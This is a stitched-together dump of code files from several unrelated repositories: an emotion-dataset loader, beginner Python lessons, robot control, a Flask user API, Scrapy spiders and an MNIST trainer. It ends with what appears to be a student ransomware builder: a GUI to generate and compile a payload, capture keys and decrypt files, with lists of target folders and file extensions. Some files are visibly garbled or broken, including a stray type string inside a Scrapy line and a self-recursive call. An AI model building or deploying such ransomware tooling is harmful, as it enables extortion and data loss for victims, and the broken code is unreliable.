0: sample['image'] = seg(image=sample['image']) if not (self.transforms is None): sample['image'] = self.transforms(sample['image']) return Normalize(mean=self.mean, std=self.std)(ToTensor()(sample['image'])), sample['emotion'] def online_normalization(self, x): return Normalize(mean=self.mean, std=self.std)(ToTensor()(x)) def norm_input_to_orig_input(self, x): x_r = torch.zeros(x.size()) x_r[0] = (x[2] * self.std[2]) + self.mean[2] x_r[1] = (x[1] * self.std[1]) + self.mean[1] x_r[2] = (x[0] * self.std[0]) + self.mean[0] return x_r @staticmethod def get_class(idx): classes = { 0: 'Neutral', 1: 'Happy', 2: 'Sad', 3: 'Surprise', 4: 'Fear', 5: 'Disgust', 6: 'Anger', 7: 'Contempt'} return classes[idx] @staticmethod def _parse_to_label(idx): """ Parse labels to make them compatible with AffectNet. :param idx: :return: """ emo_to_return = np.argmax(idx) if emo_to_return == 2: emo_to_return = 3 elif emo_to_return == 3: emo_to_return = 2 elif emo_to_return == 4: emo_to_return = 6 elif emo_to_return == 6: emo_to_return = 4 return emo_to_return @staticmethod def _process_data(emotion_raw): size = len(emotion_raw) emotion_unknown = [0.0] * size emotion_unknown[-2] = 1.0 # remove emotions with a single vote (outlier removal) for i in range(size): if emotion_raw[i] < 1.0 + sys.float_info.epsilon: emotion_raw[i] = 0.0 sum_list = sum(emotion_raw) emotion = [0.0] * size # find the peak value of the emo_raw list maxval = max(emotion_raw) if maxval > 0.5 * sum_list: emotion[np.argmax(emotion_raw)] = maxval else: emotion = emotion_unknown # force setting as unknown return [float(i) / sum(emotion) for i in emotion] def _load(self): csv_label = [] data, labels = [], [] counter_loaded_images_per_label = [0 for _ in range(self.num_labels)] path_folders_images = path.join(self.base_path_to_FER_plus, 'Images', self.fer_sets[self.idx_set]) path_folders_labels = path.join(self.base_path_to_FER_plus, 'Labels', self.fer_sets[self.idx_set]) with open(path_folders_labels + '/label.csv') as csvfile: lines = csv.reader(csvfile) for row in lines: csv_label.append(row) # Shuffle training set if self.idx_set == 0: np.random.shuffle(csv_label) for l in csv_label: emotion_raw = list(map(float, l[2:len(l)])) emotion = self._process_data(emotion_raw) emotion = emotion[:-2] try: emotion = [float(i) / sum(emotion) for i in emotion] emotion = self._parse_to_label(emotion) except ZeroDivisionError: emotion = 9 if (emotion < self.num_labels) and (counter_loaded_images_per_label[int(emotion)] < self.max_loaded_images_per_label): counter_loaded_images_per_label[int(emotion)] += 1 img = np.array(uimage.read(path.join(path_folders_images, l[0])), np.uint8) box = list(map(int, l[1][1:-1].split(','))) if box[-1] != 48: print("[INFO] Face is not centralized.") print(path.join(path_folders_images, l[0])) print(box) exit(-1) img = img[box[0]:box[2], box[1]:box[3], :] img = uimage.resize(img, self.image_size) data.append(img) labels.append(emotion) has_loading_finished = (np.sum(counter_loaded_images_per_label) >= (self.max_loaded_images_per_label * self.num_labels)) if has_loading_finished: break return [np.array(data), np.array(labels)] ```
{ "source": "20-1-SKKU-OSS/c9-python-getting-started", "score": 3 }
#### File: more-python-for-beginners/01 - Formatting and linting/bad.py ```python x = 12 if x == 24: print('Is valid') else: print("Not valid") def helper(name='sample'): pass def another(name = 'sample'): pass ``` #### File: python-for-beginners/18 - Decorators/decorators_simple.py ```python def decorator_function(original_function): def wrapper_function(): print('{} function is about to be called'.format(original_function.__name__)) return original_function() return wrapper_function # Define normal function that print one line def display_1(): print('display_1 function is running.') # Define normal function that print one line def display_2(): print('display_2 function is running.') # Define with @decorator_function @decorator_function def display_3(): print('display_3 function is running.') # Reassign display_1 function to use decorator function display_1 = decorator_function(display_1) # This will be called with decorator function, because of reassigning display_1() print() # This will be called with decorator function decorator_function(display_2)() print() # This will be called without decorator function display_2() print() # This will be called with decorator function, because of @decorator_function display_3() ```
{ "source": "2020-2021-s2-autonomous-robotics-b/psb-noah.github.io", "score": 3 }
#### File: 2020-2021-s2-autonomous-robotics-b/psb-noah.github.io/first.py ```python from locorobo import LocoRobo from locorobo import MotorDirection from locorobo import Data from locorobo import WaitType from locorobo import Song from locorobo import Note def get_robot(robots, name): robot = None # Search through robots found during the scan for # the one we want for r in robots.values(): if r.name == name: robot = r # We found the robot, so stop the for loop break # If we did not find the robot during the scan, stop the program if not robot: raise Exception('Could not find robot with specified name') return robot def main(): # Tell LocoRobo what serial port to use LocoRobo.setup("/dev/tty.usbmodem1") # Scan for robots robots = LocoRobo.scan(2000) # Use get_robots to find robot with name lr d2:fa in the scan result robot = get_robot(robots, "lr d2:fa") robot.connect() robot.activate_motors() robot.enable_sensor(Data.ULTRASONIC, True) #setup the distance to be travelled in centimeters distance_cm = 100 # tried to use ultrasonic sensors to detect how far away a wall was, didn't go too well # distance_cm = robot.get_sensor_value(Data.ULTRASONIC) - 10 #so that the robot doesn't HIT the wall # print(distance_cm) robot.setup_wait(WaitType.DISTANCE, distance_cm * 1000) robot.move(MotorDirection.FORWARD, MotorDirection.FORWARD, 1, 1, True) robot.deactivate_motors() robot.disconnect() # If we are on the main thread, run the program if __name__ == "__main__": try: main() except: LocoRobo.stop() raise LocoRobo.stop() # For compatibility with webapp's python, we can't use finally. # If you are using local python, you can do the following # # try: # main() # finally: # LocoRobo.stop() ```
{ "source": "2020-A-JS-GR1/py-velasquez-revelo-jefferson-david", "score": 3 }
#### File: ProyectoGrupal2B/api/artesanosController.py ```python from flask import Flask, request from flask_restplus import Namespace, Resource, Api, fields import pymongo from bson import ObjectId from database import get_db api = Namespace('artesanos', description='artesanos related operations') artesanosParser = api.parser() artesanosParser.add_argument( 'page', type=int, help='page number', location='head') artesanosParser.add_argument('pageSize', type=int, help='page size', location='head') queryArtesanos = {"tipoUser": 1, "tipoId": 1, "identificacion": 1, "email": 1, "apellidos": 1, "nombres": 1, "direccion": 1, "ubicacion": 1, "telefonos": 1, "estado": 1, "intentos": 1, "servicios": 1 } servicesParser = api.parser() servicesParser.add_argument( 'page', type=int, help='page number', location='head') servicesParser.add_argument('pageSize', type=int, help='page size', location='head') servicesParser.add_argument('service', type=str, help='serviceName', location='head') allParser = api.parser() allParser.add_argument( 'page', type=int, help='page number', location='head') allParser.add_argument('pageSize', type=int, help='page size', location='head') allParser.add_argument('service', type=str, help='serviceName', location='head') allParser.add_argument('canton', type=str, help='canton', location='head') allParser.add_argument('parroquia', type=str, help='parroquia', location='head') queryServices = {"tipoUser": 1, "tipoId": 1, "identificacion": 1, "email": 1, "apellidos": 1, "nombres": 1, "direccion": 1, "ubicacion": 1, "telefonos": 1, "estado": 1, "intentos": 1, "servicios": 1 } @api.route('/') class Artesanos(Resource): @api.doc(parser=artesanosParser) def get(self): db = get_db() args = request.args page = int(args['page']) pageSize = int(args['pageSize']) people = list(db["users"].find({"tipoUser": "artesano"}, queryArtesanos).skip( page * pageSize).limit(pageSize)) for person in people: person['_id'] = str(person['_id']) return {"total": db["users"].count_documents({"tipoUser": "artesano"}), "items": people}, 200 @api.route('/artesanos-by-service') class ArtesanosService(Resource): @api.doc(parser=servicesParser) def get(self): db = get_db() args = request.args page = int(args['page']) pageSize = int(args['pageSize']) if args['service']: people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service']}, queryServices).skip( page * pageSize).limit(pageSize)) else: people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip( page * pageSize).limit(pageSize)) for person in people: person['_id'] = str(person['_id']) return {"total": db["users"].count_documents({"tipoUser": "artesano", "servicios": args['service']}), "items": people}, 200 @api.route('/artesanos-by-all') class ArtesanosService2(Resource): @api.doc(parser=allParser) def get(self): db = get_db() args = request.args page = int(args['page']) pageSize = int(args['pageSize']) if args['service'] and args['canton'] and args['parroquia']: people = list(db["users"].find({"tipoUser": "artesano", "servicios": args['service'], "ubicacion.parroquia": args['parroquia']}, queryServices).skip( page * pageSize).limit(pageSize)) else: people = list(db["users"].find({"tipoUser": "artesano"}, queryServices).skip( page * pageSize).limit(pageSize)) for person in people: person['_id'] = str(person['_id']) return {"total": len(people), "items": people}, 200 ``` #### File: ProyectoGrupal2B/api/sessionsController.py ```python from flask import Flask, request from flask_restplus import Namespace, Resource, Api, fields import pymongo from bson import ObjectId from database import get_db import hashlib api = Namespace('sessions', description='Session related operations') sessionPayload = api.model('sessionPayload', { "email": fields.String, "password": fields.String }) passwordPayload = api.model('passwordPayload', { "oldPassword": fields.String, "newPassword": fields.String }) lockUsersPayload = api.model('lockUsersPayload',{ "action": fields.String }) @api.route('/') class Sessions(Resource): @api.expect(sessionPayload) def post(self): collection = get_db()["users"] body = api.payload if body: body['password'] = str(hashlib.sha256( body['password'].encode()).hexdigest()) user = collection.find_one({"email": body["email"]}) if user is None: return {"invaliCredentials": True}, 401 if user['password'] == body['password'] and user['intentos'] < 3 and user['estado']: collection.update_one({"email": body["email"]}, { "$set": {"intentos": 0}}) return {"_id" : str(user['_id'])}, 200 elif user['intentos'] >= 3 and user['estado']: collection.update_one({"email": body["email"]}, { "$set": {"estado": False}}) return {"userBlocked": True}, 403 elif not user['estado']: return {"userBlocked": True}, 403 elif not user['estado']: return {"userBlocked": True}, 403 collection.update_one({"email": body["email"]}, { "$inc": {"intentos": 1}}) return {"invaliCredentials": True}, 401 @api.route('/<string:id>') class Session(Resource): @api.expect(passwordPayload) def put(self, id): collection = get_db()["users"] body = api.payload body['oldPassword'] = str(hashlib.sha256( body['oldPassword'].encode()).hexdigest()) body['newPassword'] = str(hashlib.sha256( body['newPassword'].encode()).hexdigest()) user = collection.find_one({"_id": ObjectId(id)}) if user is None: return {"id": id}, 404 elif user['password'] == body['oldPassword']: collection.update_one({"_id": ObjectId(id)}, {"$set": {"password": body['newPassword']}}) return {"passwordUpdated": True}, 200 return {"passwordUpdated": False}, 403 @api.route('/unlock-users/<string:id>') class Lock(Resource): @api.expect(lockUsersPayload) def post(self, id): collection = get_db()["users"] user = collection.find_one({"_id": ObjectId(id)}) if user is None: return {"id": id}, 404 body = api.payload status = True if body['action'] == "lock": status = False elif body['action'] == "unlock": status = True collection.update_one({"_id": ObjectId(id)}, {"$set": {"estado": status, "intentos": 0}}) return {"UserIsLocked": not status}, 200 ``` #### File: ProyectoGrupal2B/api/usersController.py ```python from flask import Flask, request from flask_restplus import Namespace, Resource, Api, fields import pymongo from bson import ObjectId from database import get_db import hashlib api = Namespace('users', description='User related operations') locationPayload = api.model('locationPayload', { "provincia": fields.String, "canton": fields.String, "parroquia": fields.String }) userPayload = api.model('userPayload', { "tipoUser" : fields.String(["admin","cliente","artesano"]), "tipoId" : fields.String, "identificacion": fields.String, "email" : fields.String, "apellidos": fields.String, "nombres": fields.String, "direccion": fields.String, "ubicacion": fields.Nested(locationPayload), "telefonos" : fields.List(fields.String), "password" : fields.String, #el password se almacena hasheado como MD5 "estado": fields.Boolean, #activo 1, inactivo 0 "intentos": fields.Integer, #numero de intentos para el login, max 3 "servicios" : fields.List(fields.String) #solo si es artesano }) userUpdatePayload = api.model('userUpdatePayload', { "tipoUser": fields.String(["admin", "cliente", "artesano"]), "tipoId": fields.String, "identificacion": fields.String, "email": fields.String, "apellidos": fields.String, "nombres": fields.String, "direccion": fields.String, "ubicacion": fields.Nested(locationPayload), "telefonos": fields.List(fields.String), "estado" : fields.Boolean, "intentos": fields.Integer, "servicios": fields.List(fields.String) }) queryUsers = {"tipoUser": 1, "tipoId": 1, "identificacion": 1, "email": 1, "apellidos": 1, "nombres": 1, "direccion": 1, "ubicacion": 1, "telefonos": 1, "estado": 1, "intentos": 1, "servicios": 1 } userParser = api.parser() userParser.add_argument( 'page', type=int, help='page number', location='head') userParser.add_argument('pageSize', type=int, help='page size', location='head') @api.route('/') class People(Resource): @api.doc(parser=userParser) def get(self): db = get_db() args = request.args page = int(args['page']) pageSize = int(args['pageSize']) people = list(db["users"].find({}, queryUsers).skip( page * pageSize).limit(pageSize)) for person in people: person['_id'] = str(person['_id']) return {"total": db['users'].count_documents({}), "items": people}, 200 @api.expect(userPayload) def post(self): db = get_db() body = api.payload body['password'] = str(hashlib.sha256(body['password'].encode()).hexdigest()) if db["users"].find_one({"tipoId": body["tipoId"], "identificacion": body["identificacion"]}) or db["users"].find_one({"email": body["email"]}): return {"personExists": True}, 400 res = db["users"].insert_one(body) return {"_id": str(res.inserted_id)}, 200 @api.route('/<string:id>') class Person(Resource): def get(self, id): db = get_db() res = db["users"].find_one({"_id": ObjectId(id)}, queryUsers) if res is None: return {"id": id}, 404 res['_id'] = str(res['_id']) return res, 200 def delete(self, id): db = get_db() res = db['users'].delete_one({"_id": ObjectId(id)}) if res.deleted_count <= 0: return {"_id": id}, 404 return {}, 200 @api.expect(userPayload) def put(self, id): db = get_db() body = api.payload person = db['users'].find_one({"_id": ObjectId(id)}) if person == None: return {"id": id}, 404 db['users'].update_one({"_id": ObjectId(id)}, {"$set" : body}) person = db['users'].find_one({"_id": ObjectId(id)}) person['_id'] = str(person['_id']) return person, 200 ``` #### File: ProyectoGrupal2B/app/routes.py ```python import flask from flask import render_template import requests import flask_login from app import app from .user import User @app.route('/') @app.route('/index') def index(): return render_template('index.html', title='Home') @app.route('/BusquedaArtesanos') def BusquedaArtesanos(): return render_template('BusquedaArtesanos.html', title='Buscar Artesanos') @app.route('/RegistrarArtesano') def RegistrarArtesano(): return render_template('RegistrarArtesano.html', title='Registrar Artesanos') @app.route('/InscripcionCurso') def InscripcionCurso(): return render_template('InscripcionCurso.html', title='Inscripcion a Curso') @app.route('/RegistrarAcuerdo') def RegistrarAcuerdo(): return render_template('RegistrarAcuerdo.html', title='Registrar Acuerdo') @app.route('/CrearCurso') def CrearCurso(): return render_template('CrearCurso.html', title='Crear Curso') @app.route('/InfoCurso') def InfoCurso(): return render_template('InfoCurso.html', title='Informacion de Curso') @app.route('/Login', methods=['GET', 'POST']) def Login(): if flask.request.method == 'GET': return render_template('login.html', title='Login') email = flask.request.form.get('email') password = flask.request.form['password'] res = requests.post('http://127.0.0.1:5000/sessions/', json={"email": email, "password": password}) if res.status_code == 200: usrid = res.json()['_id'] user = User() user.id = usrid flask_login.login_user(user) return flask.redirect(flask.url_for('protected')) return 'Bad login' @app.route('/NuevoInstructor') def NuevoInstructor(): return render_template('NuevoInstructor.html', title='Nuevo Instructor de Curso') @app.route('/Registrate') def Registrate(): return render_template('registrate.html', title='Registrarse al Sistema') #@app.route('/RegistrarArtesano/<string:id>') #def getID(id): # idpagina = {'pagina': id} # return render_template('RegistrarArtesano.html', title='Registrar Artesanos', idpagina=idpagina) ```
{ "source": "2020akumar/MLTest", "score": 3 }
#### File: main/python/main.py ```python from android.os import Environment from tensorflow.python import keras import tensorflow as tf from tensorflow.python.keras.datasets import mnist from tensorflow.python.keras.models import Sequential from tensorflow.python.keras.layers import Dense,Dropout,Activation,Flatten from tensorflow.python.keras.layers import Conv2D, MaxPooling2D from tensorflow.python.keras .callbacks import Callback import time import os import gc import random import cv2 import numpy as np # numt=0 class TimeStop(Callback): def __init__(self,seconds=0): super(Callback,self).__init__() self.start_time=0 self.seconds=seconds def on_train_begin(self, logs=None): self.start_time=time.time() def on_batch_end(self, batch, logs=None): print(time.time()-self.start_time) if time.time()-self.start_time>self.seconds: self.model.stop_training=True print("Stopped after %s seconds"%(self.seconds)) def main(second=150,conv=2,dens=2 ): print(tf.__version__) keras.backend.clear_session() tf.reset_default_graph() graph=tf.get_default_graph() with graph.as_default(): print(second) batch_size=32 classes=10 epochs=5 img_rows, img_cols = 28, 28 (xtr,ytr),(xtst,ytst)=mnist.load_data() xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1) xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1) input_shape = (img_rows, img_cols, 1) ytr=keras.utils.to_categorical(ytr,classes) ytst=keras.utils.to_categorical(ytst,classes) model= Sequential() model.add(Conv2D(32,(3,3),input_shape=input_shape)) model.add(Activation('relu')) for aa in range(0,conv-1): model.add(Conv2D(32,(3,3))) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2,2))) model.add(Dropout(0.25)) # model.add(Conv2D(64,(3,3))) # model.add(Activation('relu')) # model.add(Conv2D(64,(3,3))) # model.add(Activation('relu')) # model.add(MaxPooling2D(pool_size=(2,2))) # model.add(Dropout(0.25)) model.add(Flatten()) for bb in range(1, dens): model.add(Dense(512//bb)) model.add(Activation("relu")) model.add(Dropout(0.5)) model.add(Dense(classes)) model.add(Activation('softmax')) # global numt # opt=keras.optimizers.Adam(lr=.0001,decay=1e-7) # optimizers=["adam","nadam","adamax"] model.compile(loss="categorical_crossentropy",optimizer="adam",metrics=['accuracy']) # numt+=1 xtr=xtr.astype('float32') xtst=xtst.astype('float32') xtr/=255 xtst/=255 stopper=TimeStop(seconds=second) model.fit(xtr,ytr,batch_size=batch_size,epochs=epochs,validation_data=(xtst,ytst),shuffle=True,callbacks=[stopper]) randomSam=random.randint(0,len(xtst)-1000) scores=model.evaluate(xtst[randomSam:randomSam+1000],ytst[randomSam:randomSam+1000],verbose=1) print("Loss:",scores[0] ) print("Accuracy:",scores[1]) #model.save('model.h5') d = str(Environment.getExternalStorageDirectory()) model.save(d+"/model.h5") del model gc.collect() # keras.backend.clear_session() # tf.reset_default_graph() # graph = tf.get_default_graph() return scores[1] def run(byte): byter=bytes(byte) keras.backend.clear_session() img_rows, img_cols = 28, 28 d = str(Environment.getExternalStorageDirectory()) new_model=tf.keras.models.load_model(d+"/model.h5") img=cv2.imdecode(np.frombuffer(byter,np.uint8),-1) img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) img = cv2.resize(img_rgb, (img_rows, img_cols), interpolation=cv2.INTER_AREA) img=cv2.bitwise_not(img) print("writing image") cv2.imwrite(d+"/processedImage.jpg", img) print("saved") print('here') print(img.shape) img=np.asarray(img) print(img.shape) img=np.expand_dims(img,axis=0) img=np.expand_dims(img,axis=4) # classes = 10 # (xtr, ytr), (xtst, ytst) = mnist.load_data() # # xtr = xtr.reshape(xtr.shape[0], img_rows, img_cols, 1) # xtst = xtst.reshape(xtst.shape[0], img_rows, img_cols, 1) # randomSam = random.randint(0, len(xtst) - 1000) # ytr = keras.utils.to_categorical(ytr, classes) # ytst = keras.utils.to_categorical(ytst, classes) # scores = new_model.evaluate(xtst[randomSam:randomSam + 1000], ytst[randomSam:randomSam + 1000], verbose=1) # print("Loss:", scores[0]) # print("Accuracy:", scores[1]) # print( new_model.summary()) run(bytearray) result=new_model.predict(img,1) print(result) return np.argmax(result[0]) def test(byte): # direct=str(Environment.getExternalStorageDirectory()) # print(os.listdir(direct)); # print (os.listdir("storage/emulated/0/DCIM")) # # img=cv2.cvtColor(cv2.imread(direct+filename),cv2.COLOR_BGR2GRAY) # img=cv2.imread(direct+filename) # print(img.shape) # return str(image.shape) print(type(byte)) byte=bytes(byte) print(type(byte)) img=cv2.imdecode(np.frombuffer(byte,np.uint8),-1) img_rgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB) print(img_rgb.shape) #main(10, 2,2) #run("C:\\Users\\adity\\Documents\\mn.png") # main(10,2,3) #C:\Users\adity\Downloads\test.jpg ```
{ "source": "2020-A-Python-GR1/py-sanango-simbana-edison-ubaldo", "score": 3 }
#### File: arania_basica/spiders/arania_ejemplo.py ```python import scrapy class IntroSpider(scrapy.Spider): name = 'introduccion_spider' urls = [ 'http://books.toscrape.com/catalogue/category/books/travel_2/index.html' ] def start_requests(self): for url in self.urls: yield scrapy.Request(url=url) def parse(self, response): etiqueta_contenedora = response.css( 'article.product_pod' ) # titulos titulos = etiqueta_contenedora.css( 'h3 > a::text' ).extract() print("**************TITULOS******************* {}".format(titulos)) # url url = etiqueta_contenedora.css( "div.image_container > a > img.thumbnail::attr(src)" ).extract() print("**************URL********** {}".format(url)) # stock stock = etiqueta_contenedora.css( "div.product_price > p.instock.availability::text" ).extract() stock_lista = list() for i in stock: aux = i.split('\n') if len(aux) > 2: stock_lista.append(aux[2])<class 'float'> print("**********STOCK************* {}".format(stock_lista)) # dinero dinero = etiqueta_contenedora.css( "div.product_price > p.price_color::text" ).extract() dinero_lista = list() for i in dinero: dinero_lista.append(float(i.split('£')[1])) print("*******DINERO*********** {}".format(dinero_lista)) print(type(dinero_lista[0])) # stars estrellas = etiqueta_contenedora.css( "article.product_pod > p::attr(class)" ).extract() estrellas_lista = list() for i in estrellas: estrellas_lista.append(i.split('star-rating ')[1]) print("**************ESTRELLAS*********** {}".format(estrellas_lista)) # para ejecutar se hace lo siguiente: # scrapy crawl name // en este caso name es introduccion_spider ``` #### File: fybeca/spiders/arania_fybeca.py ```python import scrapy import pandas as pd class IntroSpider(scrapy.Spider): name = 'fybeca_spider' urls = [ 'https://www.fybeca.com/FybecaWeb/pages/search-results.jsf?cat=639&s=0&pp=25' ] def start_requests(self): for url in self.urls: yield scrapy.Request(url=url) def parse(self, response): etiqueta_contenedora = response.css( 'div.product-tile-inner' ) # nombres productos productos = list(etiqueta_contenedora.css( "a.name::text" ).extract()) # imagen url = list(etiqueta_contenedora.css( "div.detail > a.image > img#gImg.productImage::attr(src)" ).extract()) # precio original precio_original = etiqueta_contenedora.css( "div.detail > div.side > div.price::attr(data-bind)" ).extract() # precio miembro precio_miembro = list(etiqueta_contenedora.css( "div.detail > div.side > div.price-member > div::attr(data-bind)" ).extract()) # limpieza de datos precio_miembro_final = list() for i in precio_miembro: precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')","")) precio_miembro_final.append(precio) precio_original_final = list() for i in precio_original: precio = float(i.replace("text:'$' + (","").replace(").formatMoney(2, '.', ',')","")) precio_original_final.append(precio) resultado = pd.DataFrame(zip(productos, url, precio_original_final, precio_miembro_final), columns=['Productos','Imagen','Precio normal', 'Precio miembro']) resultado['Diferencia precios'] = resultado['Precio normal'] - resultado['Precio miembro'] #resultado = resultado.sort_values(by='Diferencia precios',ascending=False) print(resultado) # RESPUESTAS # cual es el item con mayor y menor precio -- por precio normales mayor_precio = resultado.iloc[resultado['Precio normal'].idxmax()] print("ITEM CON MAYOR PRECIO NORMAL:") print(mayor_precio) menor_precio = resultado.iloc[resultado['Precio normal'].idxmin()] print("ITEM CON MENOR PRECIO NORMAL:") print(menor_precio) # cuanto ahorramos si compramos todo como afiliado ahorrado = resultado.sum() print("AL COMPRAR COMO AFILIADO SE AHORRA:{}".format(ahorrado['Diferencia precios'])) ``` #### File: item_fybeca/item_fybeca/items.py ```python import scrapy from scrapy.loader.processors import MapCompose from scrapy.loader.processors import TakeFirst def transformar_url_imagen(texto): url_fybeca = 'https://www.fybeca.com' cadena_text = '../..' return texto.replace(cadena_text,url_fybeca) class ProductoFybeca(scrapy.Item): titulo = scrapy.Field() imagen = scrapy.Field( input_processor = MapCompose( # lista de funciones transformar_url_imagen ), output_processor = TakeFirst() # Obtiene una lista y con el takefirst solo se toma el primero ) ```
{ "source": "2020-A-Python-GR1/py-sarzosa-saquinga-carlos-eduardo", "score": 3 }
#### File: arania_basica/spiders/arania_ejemplo.py ```python import scrapy class IntroSpider(scrapy.Spider): name = 'introduccion_spider' urls = [ 'http://books.toscrape.com/catalogue/category/books/travel_2/index.html' ] def start_requests(self): for url in self.urls: yield scrapy.Request(url=url) def parse(self, response): etiqueta_contenedora = response.css( 'article.product_pod' ) titulos = etiqueta_contenedora.css( 'h3 > a::text' ).extract() print(titulos) ``` #### File: RASOMWARE/CODIGO/main.py ```python import os, sys, subprocess, threading, time, datetime, socket, select, webbrowser, base64, platform, base64, requests, hashlib from tkinter import * from tkinter.ttk import * from ttkthemes import ThemedStyle from tkinter import messagebox from tkinter.filedialog import askopenfilename from tkinter.filedialog import askdirectory if platform.system() == 'Linux': from PIL import Image, ImageTk else: import PIL.Image, PIL.ImageTk from src.create_demon import * from src.create_decrypt import * try: from Crypto import Random from Crypto.Cipher import AES from pymsgbox import * except ImportError as e: print('ERROR - Failed to import some modules.\n%s' % e) pass try: import pyaes except ImportError: print('ERROR - Failed to import some modules.\n%s' % e) def resource_path(relative_path): if hasattr(sys, '_MEIPASS'): return os.path.join(sys._MEIPASS, relative_path) return os.path.join(os.path.abspath("."), relative_path) def dec_key(): key = password(text='Por favor ingrese su clave de descifrado', title='Ingresar Clave', mask ='*') if key == None or key == '': messagebox.showwarning('Error', 'Sin Clave. Cancelado...') return False return key def dec_path(): path = askdirectory(title = 'Seleccionar el directorio con archivos para descifrar') if path == None or path == '': messagebox.showwarning('Error', 'Ninguna ruta seleccionada, saliendo...') return False path = path + '/' return path def pad(s): return s + b"\0" * (AES.block_size - len(s) % AES.block_size) def decrypt(ciphertext, key): iv = ciphertext[:AES.block_size] cipher = AES.new(key, AES.MODE_CBC, iv) plaintext = cipher.decrypt(ciphertext[AES.block_size:]) return plaintext.rstrip(b"\0") def decrypt_file(file_name, key): with open(file_name, 'rb') as f: ciphertext = f.read() dec = decrypt(ciphertext, key) with open(file_name[:-6], 'wb') as f: f.write(dec) def decrypt_file_pyaes(file_name, key): aes = pyaes.AESModeOfOperationCTR(key) with open(file_name, 'rb') as fo: plaintext = fo.read() dec = aes.decrypt(plaintext) with open(file_name[:-6], 'wb') as fo: fo.write(dec) def rename_file(file_name): os.rename(file_name, file_name[:-6]) class MainWindow(Tk): def __init__(self): Tk.__init__(self) self.title(string = "Proyecto Bimestral Python") # Set window title self.resizable(0,0) # Do not allow to be resized self.ttkStyle = ThemedStyle() self.ttkStyle.set_theme("ubuntu") # Top menu menu = Menu(self) self.config(background = 'white', menu=menu) # Input field data is being inserted in this dict self.options = { 'agreed' : IntVar(), 'host' : StringVar(), 'port' : IntVar(), 'save_keys' : IntVar(), 'remote' : StringVar(), 'local' : StringVar(), 'platform' : StringVar(), 'key' : StringVar(), 'os' : StringVar(), 'full_screen_var' : IntVar(), 'mode' : IntVar(), 'demo' : IntVar(), 'type' : StringVar(), 'method' : StringVar(), 'icon_path' : StringVar(), 'payload_path' : StringVar(), 'decryptor_path' : StringVar(), 'msg' : StringVar(), 'new_msg' : StringVar(), 'img_base64' : StringVar(), 'debug' : IntVar(), 'ext' : StringVar(), 'target_ext' : StringVar(), 'new_target_ext' : StringVar(), 'target_dirs' : StringVar(), 'new_target_dirs' : StringVar(), 'working_dir' : StringVar(), 'new_working_dir' : StringVar(), 'remove_payload' : IntVar(), 'runas' : IntVar(), 'inf_counter' : IntVar(), } self.options['agreed'].set(1) #<activate> if not self.options['agreed'].get() == 1: self.show_license() # Load profile self.options['inf_counter'].set(0) # Default Settings self.options['host'].set('127.0.0.1') self.options['port'].set(8989) self.options['save_keys'].set(0) self.options['full_screen_var'].set(0) self.options['mode'].set(1) self.options['demo'].set(0) self.options['type'].set('pycrypto') self.options['method'].set('override') self.options['debug'].set(0) self.options['ext'].set('.DEMON') self.options['remove_payload'].set(0) self.options['runas'].set(0) self.options['working_dir'].set('$HOME') self.options['target_dirs'].set('''Downloads Documents Pictures Music Desktop Onedrive''') self.options['target_ext'].set('''txt ppt pptx doc docx gif jpg png ico mp3 ogg csv xls exe pdf ods odt kdbx kdb mp4 flv iso zip tar tar.gz rar''') self.options['msg'].set('''PROYECTO PYTHON SEMESTRE 2020-A''') self.options['img_base64'].set('''iVBORw0KGgoAAAANSUhEUgAAAlgAAAIOCAMAAABTb4MEAAAAY1BMVEVHcEy/v79/f39QUFBAQEAg ICAAAAAQEBCfn5/f39/<KEY>''') self.bind("<Escape>", self.exit_event) # Press ESC to quit app if platform.system() == 'Linux': photo = Image.open(resource_path('images/logo2.png')) resized = photo.resize((150,150), Image.ANTIALIAS) photo = ImageTk.PhotoImage(resized) else: photo = PIL.Image.open(resource_path('images/logo2.png')) resized = photo.resize((150,150), PIL.Image.ANTIALIAS) photo = PIL.ImageTk.PhotoImage(resized) label = Label(self, image=photo, background = 'white') label.image = photo # keep a reference! label.grid(row = 0, column = 0, columnspan = 3, rowspan = 4) Label(self, text = 'Proyecto Python', background = 'white', foreground = 'red', font='Helvetica 32 bold').grid(row = 2, column = 3, columnspan = 3) # Buttons generate_demon = Button(self, text = "GENERAR PAYLOAD", command = self.generate, width = 53).grid(row = 4, column = 0, columnspan = 6) compile = Button(self, text = "COMPILAR PAYLOAD", command = self.compile, width = 53).grid(row = 5, column = 0, columnspan = 6) start_server = Button(self, text="CAPTURADOR DE CLAVES", command=self.open_server, width=53).grid(row= 6,column=0,columnspan=6) decrypt = Button(self, text = "DESENCRIPTAR ARCHIVOS", command = self.decrypt_files, width = 53).grid(row = 7, column = 0, columnspan = 6) exit = Button(self, text = "SALIR", command = self.exit, width = 53).grid(row = 8, column = 0, columnspan = 6) def exploit_options(self): self.exp = Toplevel() self.exp.title(string = 'Exploit Options') self.exp.configure(background = 'white') self.exp.resizable(0,0) self.bind("<Escape>", self.close_exploit) # Press ESC to quit app Label(self.exp, text = 'Spoof extention', background = 'white').grid(row = 0, column = 0) def open_server(self): self.set = Toplevel() self.set.title(string = 'Settings') self.set.configure(background = 'white') self.set.resizable(0,0) Label(self.set, text = 'Host', background = 'white').grid(row = 1, column = 0, sticky = 'w') host = Entry(self.set, textvariable = self.options['host'], width = 30) host.grid(row = 2, column = 0, columnspan = 2) host.focus() Label(self.set, text = 'Port', background = 'white').grid(row = 3, column = 0, sticky = 'w') port = Entry(self.set, textvariable = self.options['port'], width = 30) port.grid(row = 4, column = 0, columnspan = 2) #Checkbutton(self.set, text = "Save keys to Onion Portal account", variable = self.options['save_keys'], onvalue = 1, offvalue = 0).grid(row = 5, column = 0, columnspan = 2, sticky = 'w') if host == None or host == '': messagebox.showwarning('ERROR', 'Invalid host!') elif port == None or port == '': messagebox.showwarning('ERROR', 'Invalid port!') else: self.options['host'] == host self.options['port'] == port go = Button(self.set, text = 'OK', command = self.run_server, width = 30) go.grid(row = 7, column = 0, columnspan = 2) self.set.bind('<Return>', self.set.destroy) exit = Button(self.set, text = 'CANCELAR', command = self.set.destroy, width = 30).grid(row = 8, column = 0, columnspan = 2) def run_server(self): self.set.destroy() self.serv = 